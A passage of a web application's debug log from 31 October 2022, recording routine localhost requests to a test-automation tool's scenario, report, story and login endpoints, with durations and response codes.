::1, resCode: 200 +2022-10-31T12:11:34.092Z debug: [1667218294089, duration: 3] GET:/report/635fbb75f9aefc14c8e30e79, reqOrigin: ::1, resCode: 200 +2022-10-31T12:12:05.901Z debug: [1667218325889, duration: 11] PUT:/6357a20842797f1390c87c74/db/6, reqOrigin: ::1, resCode: 200 +2022-10-31T12:12:09.978Z debug: [1667218329957, duration: 20] PUT:/6357a21542797f1390c87c75/db/18, reqOrigin: ::1, resCode: 200 +2022-10-31T12:12:38.222Z debug: [1667218328754, duration: 29468] POST:/Scenario/6357a20842797f1390c87c74/db/6, reqOrigin: ::1, resCode: 200 +2022-10-31T12:12:38.303Z debug: [1667218358300, duration: 3] GET:/report/635fbbb6f9aefc14c8e30e7b, reqOrigin: ::1, resCode: 200 +2022-10-31T12:12:42.319Z debug: [1667218331892, duration: 30427] POST:/Scenario/6357a21542797f1390c87c75/db/18, reqOrigin: ::1, resCode: 200 +2022-10-31T12:12:42.401Z debug: [1667218362393, duration: 4] GET:/report/635fbbbaf9aefc14c8e30e7d, reqOrigin: ::1, resCode: 200 +2022-10-31T12:12:53.395Z debug: [1667218373383, duration: 12] PUT:/6357a20842797f1390c87c74/db/6, reqOrigin: ::1, resCode: 200 +2022-10-31T12:13:24.983Z debug: [1667218375555, duration: 29427] POST:/Scenario/6357a20842797f1390c87c74/db/6, reqOrigin: ::1, resCode: 200 +2022-10-31T12:13:25.059Z debug: [1667218405056, duration: 2] GET:/report/635fbbe4f9aefc14c8e30e7f, reqOrigin: ::1, resCode: 200 +2022-10-31T12:13:55.318Z debug: [1667218413413, duration: 21905] POST:/Scenario/6357a20842797f1390c87c74/db/7, reqOrigin: ::1, resCode: 200 +2022-10-31T12:13:55.377Z debug: [1667218435374, duration: 3] GET:/report/635fbc03f9aefc14c8e30e81, reqOrigin: ::1, resCode: 200 +2022-10-31T12:13:59.222Z debug: [1667218439190, duration: 32] POST:/6357a21542797f1390c87c75/db, reqOrigin: ::1, resCode: 200 +2022-10-31T12:14:04.972Z debug: [1667218444950, duration: 21] PUT:/6357a21542797f1390c87c75/db/19, reqOrigin: ::1, resCode: 200 +2022-10-31T12:14:31.243Z debug: [1667218442231, duration: 29011] POST:/Scenario/6357a20842797f1390c87c74/db/8, reqOrigin: ::1, resCode: 200 +2022-10-31T12:14:31.305Z debug: [1667218471301, duration: 4] GET:/report/635fbc27f9aefc14c8e30e83, reqOrigin: ::1, resCode: 200 +2022-10-31T12:14:54.771Z debug: [1667218494762, duration: 8] PUT:/6357a20842797f1390c87c74/db/8, reqOrigin: ::1, resCode: 200 +2022-10-31T12:15:30.561Z debug: [1667218497756, duration: 32804] POST:/Scenario/6357a20842797f1390c87c74/db/8, reqOrigin: ::1, resCode: 200 +2022-10-31T12:15:30.645Z debug: [1667218530643, duration: 2] GET:/report/635fbc62f9aefc14c8e30e85, reqOrigin: ::1, resCode: 200 +2022-10-31T12:15:37.815Z debug: [1667218537797, duration: 18] PUT:/6357a21542797f1390c87c75/db/19, reqOrigin: ::1, resCode: 200 +2022-10-31T12:16:25.077Z debug: [1667218585061, duration: 16] GET:/reportHistory/6357a20842797f1390c87c74, reqOrigin: ::1, resCode: 200 +2022-10-31T12:16:27.102Z debug: [1667218586825, duration: 276] GET:/report/reporting_1667217521776, reqOrigin: ::1, resCode: 200 +2022-10-31T12:16:28.344Z debug: [1667218539145, duration: 49198] POST:/Scenario/6357a21542797f1390c87c75/db/19, reqOrigin: ::1, resCode: 200 +2022-10-31T12:16:28.393Z debug: [1667218588391, duration: 2] GET:/report/635fbc9cf9aefc14c8e30e87, reqOrigin: ::1, resCode: 200 +2022-10-31T12:16:30.886Z debug: [1667218590881, duration: 5] POST:/background/update/6357a20842797f1390c87c74/db, reqOrigin: ::1, resCode: 200 +2022-10-31T12:16:30.936Z debug: [1667218590927, duration: 8] PUT:/6357a20842797f1390c87c74/db/8, reqOrigin: ::1, resCode: 200 +2022-10-31T12:16:45.026Z debug: [1667218605023, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T12:16:45.057Z debug: [1667218605053, duration: 4] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T12:16:46.989Z debug: [1667218606984, duration: 4] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T12:16:47.101Z debug: [1667218607090, duration: 10] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T12:16:47.105Z debug: [1667218607092, duration: 12] GET:/stepTypes, reqOrigin: ::1, resCode: 200 +2022-10-31T12:16:47.140Z debug: [1667218607114, duration: 24] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T12:16:47.150Z debug: [1667218607132, duration: 17] GET:/stepTypes, reqOrigin: ::1, resCode: 200 +2022-10-31T12:16:47.192Z debug: [1667218607087, duration: 104] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T12:16:47.211Z debug: [1667218607133, duration: 78] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T12:16:49.576Z debug: [1667218609574, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T12:16:49.604Z debug: [1667218609602, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T12:16:55.013Z debug: [1667218614984, duration: 22] PUT:/6357a21542797f1390c87c75/db/19, reqOrigin: ::1, resCode: 200 +2022-10-31T12:17:04.586Z debug: [1667218590971, duration: 33613] POST:/Scenario/6357a20842797f1390c87c74/db/8, reqOrigin: ::1, resCode: 200 +2022-10-31T12:17:04.673Z debug: [1667218624670, duration: 3] GET:/report/635fbcc0f9aefc14c8e30e89, reqOrigin: ::1, resCode: 200 +2022-10-31T12:17:09.551Z debug: [1667218629525, duration: 24] GET:/reportHistory/6357a20842797f1390c87c74, reqOrigin: ::1, resCode: 200 +2022-10-31T12:17:38.975Z debug: [1667218658972, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T12:17:38.996Z debug: [1667218658992, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T12:17:57.837Z debug: [1667218616884, duration: 60953] POST:/Scenario/6357a21542797f1390c87c75/db/19, reqOrigin: ::1, resCode: 200 +2022-10-31T12:17:57.907Z debug: [1667218677903, duration: 3] GET:/report/635fbcf5f9aefc14c8e30e8b, reqOrigin: ::1, resCode: 200 +2022-10-31T12:21:46.186Z debug: [1667218906096, duration: 89] POST:/login, reqOrigin: ::1, resCode: 200 +2022-10-31T12:21:46.904Z debug: [1667218906893, duration: 11] GET:/repositories, reqOrigin: ::1, resCode: 304 +2022-10-31T12:21:47.402Z debug: [1667218907399, duration: 3] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T12:21:47.662Z debug: [1667218907656, duration: 6] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T12:21:47.663Z debug: [1667218907659, duration: 4] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T12:21:47.709Z debug: [1667218907658, duration: 51] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T12:22:08.456Z debug: [1667218928453, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T12:22:13.748Z debug: [1667218933744, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T12:22:40.734Z debug: [1667218960718, duration: 16] POST:/6357a1fc42797f1390c87c73/db, reqOrigin: ::1, resCode: 200 +2022-10-31T12:25:10.133Z debug: [1667219110121, duration: 10] PUT:/6357a1fc42797f1390c87c73/db/9, reqOrigin: ::1, resCode: 200 +2022-10-31T12:31:38.144Z debug: [1667219498131, duration: 13] GET:/reportHistory/6357a20842797f1390c87c74, reqOrigin: ::1, resCode: 200 +2022-10-31T12:31:40.085Z debug: [1667219499752, duration: 332] GET:/report/reporting_1667218666646, reqOrigin: ::1, resCode: 200 +2022-10-31T12:32:43.457Z debug: [1667219563454, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T12:32:43.486Z debug: [1667219563484, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T12:37:19.765Z debug: [1667219839737, duration: 27] POST:/6357a21542797f1390c87c75/db, reqOrigin: ::1, resCode: 200 +2022-10-31T12:38:14.293Z debug: [1667219894272, duration: 21] PUT:/6357a21542797f1390c87c75/db/20, reqOrigin: ::1, resCode: 200 +2022-10-31T12:38:36.805Z debug: [1667219895696, duration: 21108] POST:/Scenario/6357a21542797f1390c87c75/db/20, reqOrigin: ::1, resCode: 200 +2022-10-31T12:38:36.886Z debug: [1667219916883, duration: 3] GET:/report/635fc1ccf9aefc14c8e30e93, reqOrigin: ::1, resCode: 200 +2022-10-31T12:39:29.813Z debug: [1667219969793, duration: 20] PUT:/6357a21542797f1390c87c75/db/20, reqOrigin: ::1, resCode: 200 +2022-10-31T12:39:59.553Z debug: [1667219971872, duration: 27681] POST:/Scenario/6357a21542797f1390c87c75/db/20, reqOrigin: ::1, resCode: 200 +2022-10-31T12:39:59.631Z debug: [1667219999629, duration: 2] GET:/report/635fc21ff9aefc14c8e30e95, reqOrigin: ::1, resCode: 200 +2022-10-31T12:40:19.671Z debug: [1667220019662, duration: 9] GET:/reportHistory/6357a20842797f1390c87c74, reqOrigin: ::1, resCode: 304 +2022-10-31T12:40:23.342Z debug: [1667220023339, duration: 2] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T12:40:23.427Z debug: [1667220023414, duration: 12] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T12:40:23.427Z debug: [1667220023415, duration: 12] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T12:40:23.476Z debug: [1667220023411, duration: 65] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T12:40:23.477Z debug: [1667220023460, duration: 16] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T12:40:23.478Z debug: [1667220023460, duration: 18] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T12:40:23.548Z debug: [1667220023505, duration: 43] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T12:40:25.124Z debug: [1667220025122, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T12:40:25.156Z debug: [1667220025154, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T12:40:26.405Z debug: [1667220026396, duration: 8] GET:/reportHistory/6357a20842797f1390c87c74, reqOrigin: ::1, resCode: 304 +2022-10-31T12:40:28.576Z debug: [1667220028252, duration: 324] GET:/report/reporting_1667218666646, reqOrigin: ::1, resCode: 200 +2022-10-31T12:40:34.061Z debug: [1667220034050, duration: 9] GET:/reportHistory/6357a1fc42797f1390c87c73, reqOrigin: ::1, resCode: 200 +2022-10-31T12:40:35.682Z debug: [1667220035431, duration: 250] GET:/report/reporting_1667219600746, reqOrigin: ::1, resCode: 200 +2022-10-31T12:40:51.291Z debug: [1667220051280, duration: 10] GET:/reportHistory/6357a1f442797f1390c87c72, reqOrigin: ::1, resCode: 304 +2022-10-31T12:40:58.412Z debug: [1667220058408, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T12:40:58.477Z debug: [1667220058474, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T12:40:59.652Z debug: [1667220059649, duration: 2] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T12:40:59.737Z debug: [1667220059722, duration: 14] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T12:40:59.738Z debug: [1667220059732, duration: 6] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T12:40:59.778Z debug: [1667220059767, duration: 10] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T12:40:59.794Z debug: [1667220059718, duration: 74] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T12:40:59.797Z debug: [1667220059776, duration: 20] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T12:40:59.863Z debug: [1667220059820, duration: 43] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T12:41:00.899Z debug: [1667220060896, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T12:41:00.928Z debug: [1667220060925, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T12:41:01.987Z debug: [1667220061979, duration: 8] GET:/reportHistory/6357a1fc42797f1390c87c73, reqOrigin: ::1, resCode: 304 +2022-10-31T12:41:03.967Z debug: [1667220063674, duration: 293] GET:/report/reporting_1667219600746, reqOrigin: ::1, resCode: 200 +2022-10-31T12:41:20.399Z debug: [1667220080395, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T12:41:20.432Z debug: [1667220080429, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T12:42:06.555Z debug: [1667220126518, duration: 37] POST:/6357a21542797f1390c87c75/db, reqOrigin: ::1, resCode: 200 +2022-10-31T12:42:21.583Z debug: [1667220141580, duration: 2] GET:/logout, reqOrigin: ::1, resCode: 304 +2022-10-31T12:45:12.922Z debug: [1667220312904, duration: 17] PUT:/6357a21542797f1390c87c75/db/21, reqOrigin: ::1, resCode: 200 +2022-10-31T12:45:34.426Z debug: [1667220314208, duration: 20218] POST:/Scenario/6357a21542797f1390c87c75/db/21, reqOrigin: ::1, resCode: 200 +2022-10-31T12:45:34.634Z debug: [1667220334631, duration: 2] GET:/report/635fc36ef9aefc14c8e30e97, reqOrigin: ::1, resCode: 200 +2022-10-31T12:48:02.723Z debug: [1667220482712, duration: 11] POST:/6357a1fc42797f1390c87c73/db, reqOrigin: ::1, resCode: 200 +2022-10-31T12:49:01.008Z debug: [1667220540995, duration: 11] PUT:/6357a1fc42797f1390c87c73/db/10, reqOrigin: ::1, resCode: 200 +2022-10-31T12:49:31.410Z debug: [1667220571398, duration: 12] POST:/6357a1fc42797f1390c87c73/db, reqOrigin: ::1, resCode: 200 +2022-10-31T12:50:54.840Z debug: [1667220654828, duration: 12] PUT:/6357a1fc42797f1390c87c73/db/3, reqOrigin: ::1, resCode: 200 +2022-10-31T12:51:07.314Z debug: [1667220667300, duration: 13] PUT:/6357a1fc42797f1390c87c73/db/4, reqOrigin: ::1, resCode: 200 +2022-10-31T12:51:15.165Z debug: [1667220675153, duration: 9] PUT:/6357a1fc42797f1390c87c73/db/5, reqOrigin: ::1, resCode: 200 +2022-10-31T12:51:22.067Z debug: [1667220682055, duration: 12] PUT:/6357a1fc42797f1390c87c73/db/6, reqOrigin: ::1, resCode: 200 +2022-10-31T12:51:27.986Z debug: [1667220687977, duration: 9] PUT:/6357a1fc42797f1390c87c73/db/7, reqOrigin: ::1, resCode: 200 +2022-10-31T12:51:33.365Z debug: [1667220693353, duration: 9] PUT:/6357a1fc42797f1390c87c73/db/8, reqOrigin: ::1, resCode: 200 +2022-10-31T12:53:01.890Z debug: [1667220781876, duration: 13] PUT:/6357a1fc42797f1390c87c73/db/11, reqOrigin: ::1, resCode: 200 +2022-10-31T12:53:42.398Z debug: [1667220822388, duration: 9] PUT:/6357a1fc42797f1390c87c73/db/11, reqOrigin: ::1, resCode: 200 +2022-10-31T12:56:12.578Z debug: [1667220972565, duration: 10] PUT:/6357a1fc42797f1390c87c73/db/11, reqOrigin: ::1, resCode: 200 +2022-10-31T12:56:47.161Z debug: [1667221007152, duration: 9] PUT:/6357a1fc42797f1390c87c73/db/11, reqOrigin: ::1, resCode: 200 +2022-10-31T12:57:02.837Z debug: [1667221022826, duration: 11] PUT:/6357a1fc42797f1390c87c73/db/11, reqOrigin: ::1, resCode: 200 +2022-10-31T13:03:02.494Z debug: [1667221382483, duration: 11] GET:/reportHistory/6357a20842797f1390c87c74, reqOrigin: ::1, resCode: 200 +2022-10-31T13:03:05.190Z debug: [1667221384864, duration: 325] GET:/report/reporting_1667218666646, reqOrigin: ::1, resCode: 200 +2022-10-31T13:03:30.026Z debug: [1667221410015, duration: 11] POST:/6357a1fc42797f1390c87c73/db, reqOrigin: ::1, resCode: 200 +2022-10-31T13:03:42.761Z debug: [1667221422746, duration: 14] GET:/reportHistory/6357a21542797f1390c87c75, reqOrigin: ::1, resCode: 200 +2022-10-31T13:03:48.898Z debug: [1667221428895, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T13:03:48.917Z debug: [1667221428915, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T13:04:14.437Z debug: [1667221454424, duration: 12] PUT:/6357a1fc42797f1390c87c73/db/12, reqOrigin: ::1, resCode: 200 +2022-10-31T13:04:54.655Z debug: [1667221494642, duration: 13] POST:/6357a1fc42797f1390c87c73/db, reqOrigin: ::1, resCode: 200 +2022-10-31T13:08:04.872Z debug: [1667221684845, duration: 26] PUT:/6357a21542797f1390c87c75/db/12, reqOrigin: ::1, resCode: 200 +2022-10-31T13:08:20.362Z debug: [1667221700329, duration: 33] PUT:/6357a21542797f1390c87c75/db/13, reqOrigin: ::1, resCode: 200 +2022-10-31T13:08:36.087Z debug: [1667221716069, duration: 18] PUT:/6357a21542797f1390c87c75/db/14, reqOrigin: ::1, resCode: 200 +2022-10-31T13:09:58.813Z debug: [1667221798794, duration: 18] PUT:/6357a21542797f1390c87c75/db/15, reqOrigin: ::1, resCode: 200 +2022-10-31T13:10:26.533Z debug: [1667221826515, duration: 18] PUT:/6357a21542797f1390c87c75/db/16, reqOrigin: ::1, resCode: 200 +2022-10-31T13:11:05.996Z debug: [1667221865971, duration: 25] PUT:/6357a21542797f1390c87c75/db/17, reqOrigin: ::1, resCode: 200 +2022-10-31T13:12:09.683Z debug: [1667221929678, duration: 4] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T13:12:33.813Z debug: [1667221953802, duration: 11] GET:/reportHistory/6357a20842797f1390c87c74, reqOrigin: ::1, resCode: 200 +2022-10-31T13:12:38.605Z debug: [1667221958310, duration: 295] GET:/report/reporting_1667221517018, reqOrigin: ::1, resCode: 200 +2022-10-31T13:22:13.243Z debug: [1667222533230, duration: 10] PUT:/6357a1fc42797f1390c87c73/db/2, reqOrigin: ::1, resCode: 200 +2022-10-31T13:22:35.861Z debug: [1667222555848, duration: 11] PUT:/6357a1fc42797f1390c87c73/db/3, reqOrigin: ::1, resCode: 200 +2022-10-31T13:22:44.696Z debug: [1667222564693, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T13:22:44.714Z debug: [1667222564711, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T13:22:47.070Z debug: [1667222567060, duration: 9] GET:/reportHistory/6357a20842797f1390c87c74, reqOrigin: ::1, resCode: 304 +2022-10-31T13:22:49.301Z debug: [1667222569024, duration: 276] GET:/report/reporting_1667221517018, reqOrigin: ::1, resCode: 200 +2022-10-31T13:22:53.852Z debug: [1667222573843, duration: 9] PUT:/6357a1fc42797f1390c87c73/db/4, reqOrigin: ::1, resCode: 200 +2022-10-31T13:22:55.623Z debug: [1667222575615, duration: 8] GET:/reportHistory/6357a21542797f1390c87c75, reqOrigin: ::1, resCode: 200 +2022-10-31T13:22:59.120Z debug: [1667222579117, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T13:22:59.140Z debug: [1667222579137, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T13:23:10.556Z debug: [1667222590544, duration: 11] PUT:/6357a1fc42797f1390c87c73/db/5, reqOrigin: ::1, resCode: 200 +2022-10-31T13:23:25.418Z debug: [1667222605405, duration: 12] PUT:/6357a1fc42797f1390c87c73/db/6, reqOrigin: ::1, resCode: 200 +2022-10-31T13:23:41.860Z debug: [1667222621844, duration: 15] PUT:/6357a1fc42797f1390c87c73/db/7, reqOrigin: ::1, resCode: 200 +2022-10-31T13:23:55.187Z debug: [1667222635174, duration: 12] PUT:/6357a1fc42797f1390c87c73/db/8, reqOrigin: ::1, resCode: 200 +2022-10-31T13:24:01.648Z debug: [1667222641644, duration: 4] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T13:24:01.676Z debug: [1667222641670, duration: 5] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T13:24:14.921Z debug: [1667222654908, duration: 12] PUT:/6357a1fc42797f1390c87c73/db/10, reqOrigin: ::1, resCode: 200 +2022-10-31T13:24:27.180Z debug: [1667222667170, duration: 9] PUT:/6357a1fc42797f1390c87c73/db/11, reqOrigin: ::1, resCode: 200 +2022-10-31T13:24:36.539Z debug: [1667222676527, duration: 11] PUT:/6357a1fc42797f1390c87c73/db/12, reqOrigin: ::1, resCode: 200 +2022-10-31T13:24:47.701Z debug: [1667222687687, duration: 14] PUT:/6357a1fc42797f1390c87c73/db/13, reqOrigin: ::1, resCode: 200 +2022-10-31T13:29:29.670Z debug: [1667222969640, duration: 29] POST:/6357a1fc42797f1390c87c73/db, reqOrigin: ::1, resCode: 200 +2022-10-31T13:29:44.007Z debug: [1667222983995, duration: 12] GET:/reportHistory/6357a21542797f1390c87c75, reqOrigin: ::1, resCode: 200 +2022-10-31T13:29:49.249Z debug: [1667222988171, duration: 1077] GET:/report/reporting_1667221877331, reqOrigin: ::1, resCode: 200 +2022-10-31T13:30:16.857Z debug: [1667223016854, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T13:30:16.873Z debug: [1667223016871, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T13:30:34.977Z debug: [1667223034974, duration: 3] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T13:30:35.057Z debug: [1667223035047, duration: 10] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T13:30:35.067Z debug: [1667223035054, duration: 12] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T13:30:35.101Z debug: [1667223035094, duration: 7] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T13:30:35.105Z debug: [1667223035095, duration: 8] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T13:30:35.125Z debug: [1667223035045, duration: 80] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T13:30:35.254Z debug: [1667223035208, duration: 45] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T13:30:37.308Z debug: [1667223037305, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T13:30:37.321Z debug: [1667223037319, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T13:30:55.014Z debug: [1667223054993, duration: 21] PUT:/6357a21542797f1390c87c75/db/2, reqOrigin: ::1, resCode: 200 +2022-10-31T13:31:47.458Z debug: [1667223057732, duration: 49725] POST:/Scenario/6357a21542797f1390c87c75/db/2, reqOrigin: ::1, resCode: 200 +2022-10-31T13:31:47.547Z debug: [1667223107544, duration: 3] GET:/report/635fce43f9aefc14c8e30e9d, reqOrigin: ::1, resCode: 200 +2022-10-31T13:36:18.264Z debug: [1667223378250, duration: 13] PUT:/6357a1fc42797f1390c87c73/db/14, reqOrigin: ::1, resCode: 200 +2022-10-31T13:36:26.360Z debug: [1667223386357, duration: 2] GET:/logout, reqOrigin: ::1, resCode: 304 +2022-10-31T13:39:51.787Z debug: [1667223591778, duration: 8] GET:/reportHistory/635688ce42797f1390c87c6b, reqOrigin: ::1, resCode: 304 +2022-10-31T13:40:05.222Z debug: [1667223605220, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T13:40:05.243Z debug: [1667223605240, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T13:40:17.484Z debug: [1667223617476, duration: 8] GET:/reportHistory/635688ce42797f1390c87c6b, reqOrigin: ::1, resCode: 304 +2022-10-31T13:40:23.575Z debug: [1667223623562, duration: 12] GET:/reportHistory/6357a20842797f1390c87c74, reqOrigin: ::1, resCode: 304 +2022-10-31T13:40:28.656Z debug: [1667223628619, duration: 23] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T13:40:28.815Z debug: [1667223628757, duration: 42] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T13:46:18.990Z debug: [1667223978906, duration: 84] POST:/login, reqOrigin: ::1, resCode: 200 +2022-10-31T13:46:19.079Z debug: [1667223979070, duration: 8] GET:/repositories, reqOrigin: ::1, resCode: 304 +2022-10-31T13:46:19.167Z debug: [1667223979164, duration: 3] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T13:46:19.292Z debug: [1667223979287, duration: 4] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T13:46:19.307Z debug: [1667223979289, duration: 17] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T13:46:19.340Z debug: [1667223979276, duration: 63] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T13:46:22.277Z debug: [1667223982274, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T13:46:22.357Z debug: [1667223982354, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T13:46:34.938Z debug: [1667223994926, duration: 11] PUT:/6357a1fc42797f1390c87c73/db/14, reqOrigin: ::1, resCode: 200 +2022-10-31T13:46:53.500Z debug: [1667224013493, duration: 7] GET:/reportHistory/635b90c542797f1390c87d6c, reqOrigin: ::1, resCode: 200 +2022-10-31T13:54:14.946Z debug: [1667224454938, duration: 7] GET:/reportHistory/6357a20842797f1390c87c74, reqOrigin: ::1, resCode: 304 +2022-10-31T13:54:18.495Z debug: [1667224458493, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T13:54:18.512Z debug: [1667224458510, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T13:59:57.559Z debug: [1667224797548, duration: 10] GET:/reportHistory/6357a1e942797f1390c87c71, reqOrigin: ::1, resCode: 200 +2022-10-31T14:00:07.964Z debug: [1667224807961, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:00:07.984Z debug: [1667224807982, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:00:10.857Z debug: [1667224810843, duration: 14] GET:/reportHistory/6357a1e942797f1390c87c71, reqOrigin: ::1, resCode: 304 +2022-10-31T14:00:50.284Z debug: [1667224850273, duration: 11] GET:/reportHistory/6357a1da42797f1390c87c70, reqOrigin: ::1, resCode: 200 +2022-10-31T14:00:55.486Z debug: [1667224855477, duration: 9] GET:/reportHistory/635688ce42797f1390c87c6b, reqOrigin: ::1, resCode: 200 +2022-10-31T14:00:59.931Z debug: [1667224859921, duration: 9] GET:/reportHistory/6357a1fc42797f1390c87c73, reqOrigin: ::1, resCode: 200 +2022-10-31T14:01:05.614Z debug: [1667224865606, duration: 8] GET:/reportHistory/6357a1f442797f1390c87c72, reqOrigin: ::1, resCode: 200 +2022-10-31T14:01:10.462Z debug: [1667224870454, duration: 8] GET:/reportHistory/635b90c542797f1390c87d6c, reqOrigin: ::1, resCode: 200 +2022-10-31T14:01:23.988Z debug: [1667224883979, duration: 9] GET:/reportHistory/6357a1e942797f1390c87c71, reqOrigin: ::1, resCode: 304 +2022-10-31T14:01:30.982Z debug: [1667224890974, duration: 8] GET:/reportHistory/635b90c542797f1390c87d6c, reqOrigin: ::1, resCode: 304 +2022-10-31T14:01:33.919Z debug: [1667224893911, duration: 8] GET:/reportHistory/6357a1e942797f1390c87c71, reqOrigin: ::1, resCode: 304 